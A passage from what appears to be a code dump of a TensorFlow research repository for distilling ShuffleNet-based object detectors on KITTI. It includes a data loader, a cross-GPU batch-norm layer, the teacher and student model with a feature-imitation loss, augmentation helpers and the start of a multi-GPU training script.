shape: shape of the dense matrix.
values: A {0,1}-D array where values corresponds to the index in each row of
sp_indices.
default_value: values to set for indices not specified in sp_indices.
Return:
A dense numpy N-D array with shape output_shape.
"""
assert len(sp_indices) == len(values), \
'Length of sp_indices is not equal to length of values'
array = np.ones(output_shape) * default_value
for idx, value in zip(sp_indices, values):
array[tuple(idx)] = value
return array
image_per_batch, label_per_batch, box_delta_per_batch, aidx_per_batch, \
bbox_per_batch, mask_per_batch, mask_per_batch2 = self.read_batch()
label_indices, bbox_indices, box_delta_values, mask_indices, box_values, \
= [], [], [], [], []
aidx_set = set()
num_discarded_labels = 0
num_labels = 0
for i in range(len(label_per_batch)): # batch_size
for j in range(len(label_per_batch[i])): # number of annotations
num_labels += 1
if (i, aidx_per_batch[i][j]) not in aidx_set:
aidx_set.add((i, aidx_per_batch[i][j]))
label_indices.append(
[i, aidx_per_batch[i][j], label_per_batch[i][j]])
mask_indices.append([i, aidx_per_batch[i][j]])
bbox_indices.extend(
[[i, aidx_per_batch[i][j], k] for k in range(4)])
box_delta_values.extend(box_delta_per_batch[i][j])
box_values.extend(bbox_per_batch[i][j])
else:
num_discarded_labels += 1
image_input = image_per_batch,
input_mask = np.reshape(
sparse_to_dense(
mask_indices, [1, self.mc.ANCHORS],
[1.0] * len(mask_indices)),
[1, self.mc.ANCHORS, 1]),
box_delta_input= sparse_to_dense(
bbox_indices, [1, self.mc.ANCHORS, 4],
box_delta_values),
box_input= sparse_to_dense(
bbox_indices, [1, self.mc.ANCHORS, 4],
box_values),
labels= sparse_to_dense(
label_indices,
[1, self.mc.ANCHORS, self.mc.CLASSES],
[1.0] * len(label_indices)),
return image_input[0],input_mask[0],box_delta_input[0],box_input[0],labels[0], mask_per_batch, mask_per_batch2
def next_batch(self):
while True:
image_input, input_mask, box_delta_input, box_input, labels, mask_per_batch, mask_per_batch2 = self.load_images_and_encode_target()
yield (image_input, input_mask, box_delta_input, box_input, labels, mask_per_batch, mask_per_batch2)
def evaluate_detections(self):
raise NotImplementedError
def visualize_detections(
self, image_dir, image_format, det_error_file, output_image_dir,
num_det_per_type=10):
# load detections
with open(det_error_file) as f:
lines = f.readlines()
random.shuffle(lines)
f.close()
dets_per_type = {}
for line in lines:
obj = line.strip().split(' ')
error_type = obj[1]
if error_type not in dets_per_type:
dets_per_type[error_type] = [{
'im_idx': obj[0],
'bbox': [float(obj[2]), float(obj[3]), float(obj[4]), float(obj[5])],
'class': obj[6],
'score': float(obj[7])
}]
else:
dets_per_type[error_type].append({
'im_idx': obj[0],
'bbox': [float(obj[2]), float(obj[3]), float(obj[4]), float(obj[5])],
'class': obj[6],
'score': float(obj[7])
})
out_ims = []
# Randomly select some detections and plot them
COLOR = (200, 200, 0)
for error_type, dets in dets_per_type.iteritems():
det_im_dir = os.path.join(output_image_dir, error_type)
if os.path.exists(det_im_dir):
shutil.rmtree(det_im_dir)
os.makedirs(det_im_dir)
for i in range(min(num_det_per_type, len(dets))):
det = dets[i]
im = Image.open(
os.path.join(image_dir, det['im_idx'] + image_format))
draw = ImageDraw.Draw(im)
draw.rectangle(det['bbox'], outline=COLOR)
draw.text((det['bbox'][0], det['bbox'][1]),
'{:s} ({:.2f})'.format(det['class'], det['score']),
fill=COLOR)
out_im_path = os.path.join(det_im_dir, str(i) + image_format)
im.save(out_im_path)
im = np.array(im)
out_ims.append(im[:, :, ::-1]) # RGB to BGR
return out_ims
|
twangnh/Distilling-Object-Detectors-Shuffledet | lib/models/cross_gpu_bn.py | # -*- coding: utf-8 -*-
# File: batch_norm.py
import re
import six
import tensorflow as tf
from tensorflow.contrib.framework import add_model_variable
from tensorflow.python.training import moving_averages
import logging
logging.getLogger().level = logging.INFO
from tensorflow.contrib.framework import add_arg_scope
from tensorpack.models.registry import layer_register
__all__ = ['c_batch_norm']
def get_bn_variables(n_out, use_scale, use_bias, beta_init, gamma_init):
    """Return (beta, gamma, moving_mean, moving_var) for a BN layer.

    When scale/bias are disabled, constant tensors stand in for the
    trainable variables so the caller's normalization math is unchanged.
    """
    beta = (tf.get_variable('beta', [n_out], initializer=beta_init)
            if use_bias else tf.zeros([n_out], name='beta'))
    gamma = (tf.get_variable('gamma', [n_out], initializer=gamma_init)
             if use_scale else tf.ones([n_out], name='gamma'))
    # x * gamma + beta
    # EMA statistics are not trained directly; they are refreshed by
    # moving-average assign ops during training.
    moving_mean = tf.get_variable(
        'mean/EMA', [n_out],
        initializer=tf.constant_initializer(), trainable=False)
    moving_var = tf.get_variable(
        'variance/EMA', [n_out],
        initializer=tf.constant_initializer(1.0), trainable=False)
    return beta, gamma, moving_mean, moving_var
def update_bn_ema(xn, batch_mean, batch_var,
                  moving_mean, moving_var, decay, internal_update):
    """Attach EMA-update ops for the BN statistics and return xn as 'output'.

    With internal_update=True the updates run via control dependencies on the
    returned tensor; otherwise they are registered in tf.GraphKeys.UPDATE_OPS
    for the training loop to run explicitly.
    """
    # Keep the EMA assign ops on the CPU so every tower updates the same copy.
    with tf.device('/cpu:0'):
        mean_update = moving_averages.assign_moving_average(
            moving_mean, batch_mean, decay,
            zero_debias=False, name='mean_ema_op')
        var_update = moving_averages.assign_moving_average(
            moving_var, batch_var, decay,
            zero_debias=False, name='var_ema_op')

    if internal_update:
        with tf.control_dependencies([mean_update, var_update]):
            return tf.identity(xn, name='output')

    for op in (mean_update, var_update):
        tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, op)
    return tf.identity(xn, name='output')
@layer_register(log_shape=True)
def c_batch_norm(inputs, scope, training=None, is_main_training_tower=True, axis=None,
                 momentum=0.9, epsilon=1e-5,
                 center=True, scale=True,
                 beta_initializer=tf.zeros_initializer(),
                 gamma_initializer=tf.ones_initializer(),
                 virtual_batch_size=None,
                 data_format='NCHW',
                 internal_update=False,
                 sync_statistics='nccl'):
    """
    Almost equivalent to `tf.layers.batch_normalization`, but different (and more powerful)
    in the following:
    1. Accepts an alternative `data_format` option when `axis` is None. For 2D input, this argument will be ignored.
    2. Default value for `momentum` and `epsilon` is different.
    3. Default value for `training` is automatically obtained from tensorpack's `TowerContext`, but can be overwritten.
    4. Support the `internal_update` option, which enables the use of BatchNorm layer inside conditionals.
    5. Support the `sync_statistics` option, which is very useful in small-batch models.

    Args:
        internal_update (bool): if False, add EMA update ops to
            `tf.GraphKeys.UPDATE_OPS`. If True, update EMA inside the layer
            by control dependencies.
            They are very similar in speed, but `internal_update=True` can be used
            when you have conditionals in your model, or when you have multiple networks to train.
        sync_statistics: either None or "nccl". By default (None), it uses statistics of the input tensor to normalize.
            When set to "nccl", this layer must be used under tensorpack multi-gpu trainers,
            and it then uses per-machine (multiple GPU) statistics to normalize.
            This option has no effect when not training.
            The option is also known as "Cross-GPU BatchNorm" as mentioned in https://arxiv.org/abs/1711.07240.

    Variable Names:
    * ``beta``: the bias term. Will be zero-inited by default.
    * ``gamma``: the scale term. Will be one-inited by default. Input will be transformed by ``x * gamma + beta``.
    * ``mean/EMA``: the moving average of mean.
    * ``variance/EMA``: the moving average of variance.

    Note:
        1. Combinations of ``training`` and ``ctx.is_training``:
            * ``training == ctx.is_training``: standard BN, EMA are
              maintained during training and used during inference. This is
              the default.
            * ``training and not ctx.is_training``: still use batch statistics in inference.
            * ``not training and ctx.is_training``: use EMA to normalize in
              training. This is useful when you load a pre-trained BN and
              don't want to fine tune the EMA. EMA will not be updated in
              this case.
    """
    # parse shapes
    shape = inputs.get_shape().as_list()
    ndims = len(shape)
    assert ndims in [2, 4], ndims
    if sync_statistics is not None:
        sync_statistics = sync_statistics.lower()
    assert sync_statistics in [None, 'nccl', 'horovod'], sync_statistics

    # resolve the channel axis from data_format (or vice versa)
    if axis is None:
        if ndims == 2:
            data_format = 'NHWC'
            axis = 1
        else:
            axis = 1 if data_format == 'NCHW' else 3
    else:
        data_format = 'NCHW' if axis == 1 else 'NHWC'
    num_chan = shape[axis]

    if sync_statistics is None:
        # only the synchronized (cross-GPU) path is supported in this fork
        raise ValueError
    else:
        # reduce over batch and spatial axes, keeping the channel axis
        red_axis = [0] if ndims == 2 else ([0, 2, 3] if axis == 1 else [0, 1, 2])
        new_shape = None
        if ndims == 4 and axis == 1:
            new_shape = [1, num_chan, 1, 1]

        batch_mean = tf.reduce_mean(inputs, axis=red_axis)
        batch_mean_square = tf.reduce_mean(tf.square(inputs), axis=red_axis)
        # debug prints for cross-GPU BN (kept for reference)
        # tower_number = is_main_training_tower
        # is_main_training_tower = (is_main_training_tower == 0)
        # batch_mean = tf.Print(batch_mean, [batch_mean], 'batch_norm_mean %s' % tower_number)
        # batch_mean_square = tf.Print(batch_mean_square, [batch_mean_square], 'batch_norm_var %s' % tower_number)
        if sync_statistics == 'nccl':
            if six.PY3 and is_main_training_tower:
                logging.warn("A TensorFlow bug will cause cross-GPU BatchNorm to fail. "
                             "Apply this patch: https://github.com/tensorflow/tensorflow/pull/20360")

            from tensorflow.contrib.nccl.ops import gen_nccl_ops
            with tf.variable_scope(scope):
                # strip the tower prefix so all towers share one NCCL ring
                shared_name = re.sub('tower[0-9]+/', '', tf.get_variable_scope().name)
                # NOTE(review): device count is hard-coded; it must match the
                # number of training towers (DeploymentConfig(num_clones=4)).
                num_dev = 4
                batch_mean = gen_nccl_ops.nccl_all_reduce(
                    input=batch_mean,
                    reduction='sum',
                    num_devices=num_dev,
                    shared_name=shared_name + '_NCCL_mean') * (1.0 / num_dev)
                batch_mean_square = gen_nccl_ops.nccl_all_reduce(
                    input=batch_mean_square,
                    reduction='sum',
                    num_devices=num_dev,
                    shared_name=shared_name + '_NCCL_mean_square') * (1.0 / num_dev)
            # if is_main_training_tower:
            #     batch_mean = tf.Print(batch_mean, [batch_mean], 'batch_norm_mean')
            #     batch_mean_square = tf.Print(batch_mean_square, [batch_mean_square], 'batch_norm_var')
        elif sync_statistics == 'horovod':
            # Require https://github.com/uber/horovod/pull/331
            # Proof-of-concept, not ready yet.
            import horovod.tensorflow as hvd
            batch_mean = hvd.allreduce(batch_mean, average=True)
            batch_mean_square = hvd.allreduce(batch_mean_square, average=True)
        # Var[x] = E[x^2] - E[x]^2
        batch_var = batch_mean_square - tf.square(batch_mean)
        batch_mean_vec = batch_mean
        batch_var_vec = batch_var

        beta, gamma, moving_mean, moving_var = get_bn_variables(
            num_chan, scale, center, beta_initializer, gamma_initializer)

        if new_shape is not None:
            # broadcast the per-channel stats over NCHW spatial dims
            batch_mean = tf.reshape(batch_mean, new_shape)
            batch_var = tf.reshape(batch_var, new_shape)
            r_gamma = tf.reshape(gamma, new_shape)
            r_beta = tf.reshape(beta, new_shape)
        else:
            r_gamma, r_beta = gamma, beta
        xn = tf.nn.batch_normalization(
            inputs, batch_mean, batch_var, r_beta, r_gamma, epsilon)

        # only the main tower updates the shared EMA statistics
        if is_main_training_tower:
            ret = update_bn_ema(
                xn, batch_mean_vec, batch_var_vec, moving_mean, moving_var,
                momentum, internal_update)
        else:
            ret = tf.identity(xn, name='output')
    return ret
|
twangnh/Distilling-Object-Detectors-Shuffledet | lib/config/__init__.py | from kitti_shuffledet_config import kitti_shuffledet_config
|
twangnh/Distilling-Object-Detectors-Shuffledet | lib/models/shuffleDet_sup.py | <reponame>twangnh/Distilling-Object-Detectors-Shuffledet<filename>lib/models/shuffleDet_sup.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from lib.models.nn_skeleton import ModelSkeleton
# import tensorpack.models
from tensorpack.models.batch_norm import BatchNorm
from tensorpack.models.conv2d import Conv2D
from tensorpack.models.pool import MaxPooling, GlobalAvgPooling
from tensorpack.models.registry import layer_register
from tensorpack.tfutils import argscope
from tensorpack.tfutils.scope_utils import under_name_scope
from tensorpack.models.pool import AvgPooling
from tensorpack.models.nonlin import BNReLU
from tensorpack.tfutils.tower import TowerContext
from lib.models.cross_gpu_bn import c_batch_norm
@layer_register(log_shape=True)
def DepthConv(x, out_channel, kernel_shape, padding='SAME', stride=1,
              W_init=None, nl=tf.identity):
    """Depthwise convolution in NCHW layout.

    out_channel must be a multiple of the input channel count; the ratio
    becomes the depthwise channel multiplier.
    """
    in_channel = x.get_shape().as_list()[1]
    assert out_channel % in_channel == 0
    channel_mult = out_channel // in_channel

    if W_init is None:
        W_init = tf.variance_scaling_initializer(2.0)
    filter_shape = [kernel_shape, kernel_shape, in_channel, channel_mult]
    W = tf.get_variable('W', filter_shape, initializer=W_init)

    conv = tf.nn.depthwise_conv2d(
        x, W, [1, 1, stride, stride], padding=padding, data_format='NCHW')
    return nl(conv, name='output')
@under_name_scope()
def channel_shuffle(l, group):
    """Interleave channels across groups (ShuffleNet channel shuffle), NCHW."""
    shape = l.get_shape().as_list()
    channels, spatial = shape[1], shape[-2:]
    # split channels into (group, channels_per_group), swap, and flatten back
    l = tf.reshape(l, [-1, group, channels // group] + spatial)
    l = tf.transpose(l, [0, 2, 1, 3, 4])
    return tf.reshape(l, [-1, channels] + spatial)
def BN(x, name):
    # Plain (per-tower) batch norm; `name` is accepted to match the
    # tensorpack `nl(x, name)` callback signature but is unused -- the layer
    # is always registered under 'bn'.
    return BatchNorm('bn', x)

def RELU(x, name):
    # ReLU wrapper matching the `nl(x, name)` callback signature.
    return tf.nn.relu(x)

def c_BN(x, name):
    # Cross-GPU (synchronized) batch norm; see lib/models/cross_gpu_bn.py.
    return c_batch_norm('bn', x, '')

def c_BNReLU(x, name):
    # Cross-GPU batch norm followed by ReLU.
    l = c_batch_norm('bn', x, '')
    return tf.nn.relu(l)
class ShuffleDet_conv1_stride1(ModelSkeleton):
    """ShuffleNet-based detector (stride-1 conv1).

    Builds a full-width supervisor network in inference mode and a thin
    student network (width multiplier `student`), and adds a masked feature
    imitation (distillation) loss between the supervisor's last feature map
    and the student's adaptation layer.
    """

    def __init__(self, mc, gpu_id=0, without_imitation=False):
        with tf.device('/gpu:{}'.format(gpu_id)):
            ModelSkeleton.__init__(self, mc)
            # when True, the imitation loss is zeroed out (ablation switch)
            self.without_imitation = without_imitation

    def model_fn(self, student=0.5):
        # Build forward pass, prediction decoding, and loss graph.
        self._add_forward_graph(student)
        self._add_interpretation_graph()
        self._add_loss_graph()

    def _add_forward_graph(self, student=0.5):
        """NN architecture."""
        # dequeue one pre-encoded training example (see imdb.next_batch)
        self.image_input, self.input_mask, self.box_delta_input, \
            self.box_input, self.labels, self.mimic_mask, self.mimic_mask2 = self.batch_data_queue.dequeue()

        # ---- supervisor (teacher) building blocks: plain per-tower BN ----
        def shufflenet_unit_supervisor(l, out_channel, group, stride):
            in_shape = l.get_shape().as_list()
            in_channel = in_shape[1]
            shortcut = l
            # We do not apply group convolution on the first pointwise layer
            # because the number of input channels is relatively small.
            # (16 is the supervisor's conv1 output width.)
            first_split = group if in_channel != 16 else 1
            l = Conv2D('conv1', l, out_channel // 4, kernel_shape=1, split=first_split, nl=BNReLU)
            l = channel_shuffle(l, group)
            l = DepthConv('dconv', l, out_channel // 4, kernel_shape=3, nl=BN, stride=stride)
            l = Conv2D('conv2', l,
                       out_channel if stride == 1 else out_channel - in_channel,
                       kernel_shape=1, split=first_split, nl=BN)
            if stride == 1:  # unit (b): residual add
                output = tf.nn.relu(shortcut + l)
            else:  # unit (c): downsample and concat with pooled shortcut
                shortcut = AvgPooling('avgpool', shortcut, 3, 2, padding='SAME')
                output = tf.concat([shortcut, tf.nn.relu(l)], axis=1)
            return output

        def shufflenet_unit_add_supervisor(l, out_channel, group, stride):
            in_shape = l.get_shape().as_list()
            in_channel = in_shape[1]
            shortcut = l
            # We do not apply group convolution on the first pointwise layer
            # because the number of input channels is relatively small.
            first_split = group if in_channel != 24 else 1
            l = Conv2D('conv1', l, out_channel // 4, kernel_shape=1, split=first_split, nl=BNReLU)
            l = channel_shuffle(l, group)
            l = DepthConv('dconv', l, out_channel // 4, kernel_shape=3, nl=BN, stride=stride)
            l = Conv2D('conv2', l,
                       out_channel,
                       kernel_shape=1, split=first_split, nl=BN)
            output = tf.nn.relu(shortcut + l)
            return output

        def shufflenet_unit_no_shortcut_supervisor(l, out_channel, group, stride):
            in_shape = l.get_shape().as_list()
            in_channel = in_shape[1]
            # We do not apply group convolution on the first pointwise layer
            # because the number of input channels is relatively small.
            first_split = group if in_channel != 24 else 1
            l = Conv2D('conv1', l, out_channel // 4, kernel_shape=1, split=first_split, nl=BNReLU)
            l = channel_shuffle(l, group)
            l = DepthConv('dconv', l, out_channel // 4, kernel_shape=3, nl=BN, stride=stride)
            l = Conv2D('conv2', l,
                       out_channel,
                       kernel_shape=1, split=first_split, nl=BN)
            output = tf.nn.relu(l)
            return output

        # ---- student building blocks: cross-GPU (synchronized) BN ----
        def shufflenet_unit(l, out_channel, group, stride):
            in_shape = l.get_shape().as_list()
            in_channel = in_shape[1]
            shortcut = l
            # We do not apply group convolution on the first pointwise layer
            # because the number of input channels is relatively small.
            first_split = group if in_channel != 24 else 1
            l = Conv2D('conv1', l, out_channel // 4, kernel_shape=1, split=first_split, nl=c_BNReLU)
            l = channel_shuffle(l, group)
            l = DepthConv('dconv', l, out_channel // 4, kernel_shape=3, nl=c_BN, stride=stride)
            # NOTE(review): conv2 splits by `group` here (the supervisor unit
            # uses first_split) -- verify this asymmetry is intentional.
            l = Conv2D('conv2', l,
                       out_channel if stride == 1 else out_channel - in_channel,
                       kernel_shape=1, split=group, nl=c_BN)
            if stride == 1:  # unit (b)
                output = tf.nn.relu(shortcut + l)
            else:  # unit (c)
                shortcut = AvgPooling('avgpool', shortcut, 3, 2, padding='SAME')
                output = tf.concat([shortcut, tf.nn.relu(l)], axis=1)
            return output

        def shufflenet_unit_add(l, out_channel, group, stride):
            in_shape = l.get_shape().as_list()
            in_channel = in_shape[1]
            shortcut = l
            # We do not apply group convolution on the first pointwise layer
            # because the number of input channels is relatively small.
            first_split = group if in_channel != 24 else 1
            l = Conv2D('conv1', l, out_channel // 4, kernel_shape=1, split=first_split, nl=c_BNReLU)
            l = channel_shuffle(l, group)
            l = DepthConv('dconv', l, out_channel // 4, kernel_shape=3, nl=c_BN, stride=stride)
            l = Conv2D('conv2', l,
                       out_channel,
                       kernel_shape=1, split=first_split, nl=c_BN)
            output = tf.nn.relu(shortcut + l)
            return output

        def shufflenet_unit_no_shortcut(l, out_channel, group, stride):
            in_shape = l.get_shape().as_list()
            in_channel = in_shape[1]
            # We do not apply group convolution on the first pointwise layer
            # because the number of input channels is relatively small.
            first_split = group if in_channel != 24 else 1
            l = Conv2D('conv1', l, out_channel // 4, kernel_shape=1, split=first_split, nl=c_BNReLU)
            l = channel_shuffle(l, group)
            l = DepthConv('dconv', l, out_channel // 4, kernel_shape=3, nl=c_BN, stride=stride)
            l = Conv2D('conv2', l,
                       out_channel,
                       kernel_shape=1, split=first_split, nl=c_BN)
            output = tf.nn.relu(l)
            return output

        mc = self.mc
        # if mc.LOAD_PRETRAINED_MODEL:
        #     assert tf.gfile.Exists(mc.PRETRAINED_MODEL_PATH), \
        #         'Cannot find pretrained model at the given path:' \
        #         ' {}'.format(mc.PRETRAINED_MODEL_PATH)

        # ---- supervisor network (always inference mode, full width) ----
        with argscope([Conv2D, MaxPooling, AvgPooling, GlobalAvgPooling, BatchNorm], data_format='NCHW'), \
                argscope(Conv2D, use_bias=False):
            with TowerContext(tf.get_default_graph().get_name_scope(), is_training=False):
                with tf.variable_scope('shuffleDet_supervisor'):
                    group = 3
                    channels = [240, 480, 960]
                    # inputs arrive NHWC; the backbone runs in NCHW
                    l = tf.transpose(self.image_input, [0, 3, 1, 2])
                    l = Conv2D('conv1', l, 16, 3, stride=1, nl=BNReLU)
                    l = MaxPooling('pool1', l, 3, 2, padding='SAME')
                    with tf.variable_scope('group1'):
                        for i in range(4):
                            with tf.variable_scope('block{}'.format(i)):
                                l = shufflenet_unit_supervisor(l, channels[0], group, 2 if i == 0 else 1)
                    with tf.variable_scope('group2'):
                        for i in range(6):
                            with tf.variable_scope('block{}'.format(i)):
                                l = shufflenet_unit_supervisor(l, channels[1], group, 2 if i == 0 else 1)
                    with tf.variable_scope('group3'):
                        for i in range(4):
                            with tf.variable_scope('block{}'.format(i)):
                                l = shufflenet_unit_supervisor(l, channels[2], group, 2 if i == 0 else 1)
                    with tf.variable_scope('added3'):
                        with tf.variable_scope('block{}'.format(0)):
                            l = shufflenet_unit_add_supervisor(l, 960, 3, 1)
                        with tf.variable_scope('block{}'.format(1)):
                            l = shufflenet_unit_no_shortcut_supervisor(l, 768, 3, 1)
                    # back to NHWC; this is the imitation target
                    supervisor_last_feature = tf.transpose(l, [0, 2, 3, 1])
                    self.inspect_last_feature = supervisor_last_feature

        # ---- student network (trained, thin, cross-GPU BN) ----
        # the tower index is parsed from the last character of the name scope
        with argscope(c_batch_norm, is_main_training_tower=int(tf.get_default_graph().get_name_scope()[-1]) == 0,
                      data_format='NCHW'):
            with TowerContext(tf.get_default_graph().get_name_scope(), is_training=mc.IS_TRAINING, index=
                    int(tf.get_default_graph().get_name_scope()[-1])):
                # with TowerContext(tf.get_default_graph().get_name_scope(), is_training=mc.IS_TRAINING):
                group = 3
                # channels = [120, 240, 480]
                channels = [int(240 * student), int(480 * student), int(960 * student)]
                l = tf.transpose(self.image_input, [0, 3, 1, 2])
                l = Conv2D('conv1', l, 24, 3, stride=1, nl=c_BNReLU)
                l = MaxPooling('pool1', l, 3, 2, padding='SAME')
                with tf.variable_scope('group1'):
                    for i in range(4):
                        with tf.variable_scope('block{}'.format(i)):
                            l = shufflenet_unit(l, channels[0], group, 2 if i == 0 else 1)
                with tf.variable_scope('group2'):
                    for i in range(6):
                        with tf.variable_scope('block{}'.format(i)):
                            l = shufflenet_unit(l, channels[1], group, 2 if i == 0 else 1)
                with tf.variable_scope('group3'):
                    for i in range(4):
                        with tf.variable_scope('block{}'.format(i)):
                            l = shufflenet_unit(l, channels[2], group, 2 if i == 0 else 1)
                with tf.variable_scope('added3'):
                    with tf.variable_scope('block{}'.format(0)):
                        l = shufflenet_unit_add(l, int(960 * student), 3, 1)
                    with tf.variable_scope('block{}'.format(1)):
                        l = shufflenet_unit_no_shortcut(l, int(768 * student), 3, 1)  # 768, 384, 192
                l = tf.transpose(l, [0, 2, 3, 1])

                # 1x1-style adaptation layer maps the thin student feature to
                # the supervisor's 768 channels for imitation
                with tf.variable_scope('adaptation'):
                    student_adap = self._conv_layer_no_pretrain(
                        'conv', l, filters=768, size=3, stride=1,
                        padding='SAME', xavier=False, relu=True, stddev=0.0001)
                    # student_adap = Conv2D('conv', l, 768, 3, data_format='channels_last',nl=RELU)

                ### masked feature imitation (distillation) loss
                with tf.variable_scope('mimic_loss'):
                    mimic_mask = tf.cast(tf.expand_dims(self.mimic_mask, axis=-1), tf.float32)
                    # this normalization is maybe too harsh
                    # mask mimic: normalize by (#selected locations * width factor)
                    if student == 0.5:
                        normalization = tf.reduce_sum(mimic_mask) * 2.
                    else:
                        normalization = tf.reduce_sum(mimic_mask) * 4.
                    self.mimic_loss = tf.div(tf.reduce_sum(tf.square(
                        supervisor_last_feature - student_adap) *
                        mimic_mask), normalization)
                    # ablation: zero the imitation term but keep the graph shape
                    if self.without_imitation:
                        self.mimic_loss = self.mimic_loss * 0.
                    tf.add_to_collection('losses', self.mimic_loss)

                dropout11 = tf.nn.dropout(l, self.keep_prob, name='drop11')
                # per anchor: class scores + 1 confidence + 4 box deltas
                num_output = mc.ANCHOR_PER_GRID * (mc.CLASSES + 1 + 4)
                self.preds = self._conv_layer_no_pretrain(
                    'conv12', dropout11, filters=num_output, size=3, stride=1,
                    padding='SAME', xavier=False, relu=False, stddev=0.0001)
                # self.preds = Conv2D('conv12', dropout11, num_output, 3, data_format='channels_last', nl=None)
|
twangnh/Distilling-Object-Detectors-Shuffledet | dataset_tool/augmentation.py |
import random
import numpy as np
import cv2
def BrightnessTransform(data, delta_max = 50):
"""
Transform brightness
Parameters: delta
"""
data = data.astype(np.float32)
delta = random.randint(-delta_max, delta_max)
data += delta
data[data>255] = 255
data[data<0] = 0
data = data.astype(np.uint8)
return data
def ContrastTransform(data, lower=0.5, upper=1.5):
"""
Transform contrast
Parameters: lower, upper
"""
data = data.astype(np.float32)
delta = random.uniform(lower, upper)
data *= delta
data[data>255] = 255
data[data<0] = 0
data = data.astype(np.uint8)
return data
def SaturationTransform(data, lower=0.3, upper=1.7):
    """Randomly scale image saturation.

    Converts BGR -> HSV, multiplies the saturation (S) channel by a uniform
    factor drawn from [lower, upper], clips to [0, 255], and converts back
    to BGR uint8.
    """
    data = cv2.cvtColor(data, cv2.COLOR_BGR2HSV)
    data = data.astype(np.float32)
    delta = random.uniform(lower, upper)
    # BUG FIX: `data[1]` indexed image ROW 1 (all channels), not the
    # saturation channel. For an HxWx3 HSV image the S channel is
    # data[:, :, 1].
    data[:, :, 1] *= delta
    data[:, :, 1] = np.clip(data[:, :, 1], 0, 255)
    data = data.astype(np.uint8)
    data = cv2.cvtColor(data, cv2.COLOR_HSV2BGR)
    return data
twangnh/Distilling-Object-Detectors-Shuffledet | train_multi_gpu.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import os.path
from six.moves import xrange
import tensorflow as tf
from lib.config import *
from dataset_tool import kitti
from lib.utils.util import bbox_transform
from lib.models.shuffleDet_sup import ShuffleDet_conv1_stride1
from lib.utils import model_deploy
import tensorflow.contrib.slim as slim
import datetime
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('dataset', 'KITTI',
"""Currently only support KITTI dataset.""")
tf.app.flags.DEFINE_string('image_set', 'train',
""" Can be train, trainval, val, or test""")
tf.app.flags.DEFINE_string('year', '2007',
"""VOC challenge year. 2007 or 2012"""
"""Only used for Pascal VOC dataset""")
tf.app.flags.DEFINE_string('train_dir', '/tmp/logs/train',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 10000000,
"""Maximum number of batches to run.""")
tf.app.flags.DEFINE_string('net', 'ShuffleDet_conv1_stride1',
"""Neural net architecture. """)
tf.app.flags.DEFINE_string('pretrained_model_path', '',
"""Path to the pretrained model.""")
tf.app.flags.DEFINE_integer('summary_step', 50,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_integer('print_step', 20,
"""Number of steps to print.""")
tf.app.flags.DEFINE_integer('checkpoint_step', 500,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_float('student', 0.5, """student model, 0.5 or 0.25""")
tf.app.flags.DEFINE_bool('without_imitation', False, """whether to turn off imitation loss""")
def train():
    """Build the distillation training graph and run the optimization loop.

    Trains a student ShuffleDet detector on KITTI while imitating a frozen
    supervisor network restored from its own checkpoint.  Checkpoints and
    summaries are written to FLAGS.train_dir.
    """
    assert FLAGS.dataset == 'KITTI', \
        'Currently only support KITTI dataset'
    mc = kitti_shuffledet_config()
    mc.IS_TRAINING = True
    mc.PRETRAINED_MODEL_PATH = FLAGS.pretrained_model_path
    model = ShuffleDet_conv1_stride1(mc, without_imitation=FLAGS.without_imitation)
    with tf.Graph().as_default():
        # Replicate the model over 4 GPU clones.
        config = model_deploy.DeploymentConfig(num_clones=4)
        with tf.device(config.inputs_device()):
            # The input queue is wired with batch size 1; the per-clone
            # training batch size is restored to 8 immediately after.
            mc.BATCH_SIZE = 1
            imdb = kitti('train', './data/KITTI', mc)
            model.add_input_graph(imdb.next_batch)
            mc.BATCH_SIZE = 8
        with tf.device(config.variables_device()):
            global_step = slim.create_global_step()
        with tf.device(config.optimizer_device()):
            # Cosine-decayed momentum SGD: 0.02 -> ~0 over 40k steps.
            lr = tf.train.cosine_decay(0.02,
                                       global_step,
                                       40000,
                                       0.0000001)
            optimizer = tf.train.MomentumOptimizer(learning_rate=lr, momentum=0.9)
            tf.summary.scalar('learning_rate', lr)
        def freeze_variable_func():
            # Train everything except the (frozen) supervisor network.
            freeze_vars = tf.global_variables(scope='shuffleDet_supervisor')
            all_trainable_vars = tf.trainable_variables()
            train_vars = [item for item in all_trainable_vars if item not in freeze_vars]
            return train_vars
        model_dp = model_deploy.deploy(config, model.model_fn,
                                       args=[FLAGS.student],
                                       optimizer=optimizer, freeze_variable_func=freeze_variable_func)
        ## code a bit ugly here, will improve future.
        ## Separate the variables restored from the pretrained checkpoint
        ## (all 'g*' and 'conv1' scopes, minus global_step, conv12 and
        ## Momentum slots) from those that must be randomly initialized.
        full = tf.global_variables()
        g = tf.global_variables(scope='g')
        global_step = tf.global_variables(scope='global')
        g = [item for item in g if item not in global_step]
        c = tf.global_variables(scope='conv1')
        conv12 = tf.global_variables(scope='conv12')
        c = [item for item in c if item not in conv12]
        # NOTE(review): 'list' shadows the builtin; kept for compatibility.
        list = g + c
        momentum_list = []
        for item in list:
            if 'Mom' in item.op.name:
                momentum_list.append(item)
        list = [item for item in list if item not in momentum_list]
        list_to_be_initialized = [item for item in full if item not in list]
        init_saver = tf.train.Saver(var_list=list)
        saver = tf.train.Saver()
        def init_fn(sess):
            # Restore pretrained weights, init the rest, start input queues.
            init_saver.restore(sess, FLAGS.pretrained_model_path)
            init = tf.variables_initializer(var_list=list_to_be_initialized)
            sess.run(init)
            tf.train.start_queue_runners(sess=sess)
        sess = tf.Session()
        init_fn(sess)
        ## Restore the supervisor from its own checkpoint; the scope prefix
        ## is stripped so variable names match the checkpoint's names.
        vars_shuffleDet_supervisor = tf.global_variables(scope='shuffleDet_supervisor')
        vars_shuffleDet_supervisor_replace = {var.op.name.replace('shuffleDet_supervisor/', ''): var for var in vars_shuffleDet_supervisor}
        saver_superviser = tf.train.Saver(var_list=vars_shuffleDet_supervisor_replace)
        saver_superviser.restore(sess, './kitti-1x-supervisor/model.ckpt-725000')
        summary_op = tf.summary.merge_all()
        summary_writer = tf.summary.FileWriter(FLAGS.train_dir, sess.graph)
        for step in xrange(FLAGS.max_steps):
            # Save the model checkpoint periodically.
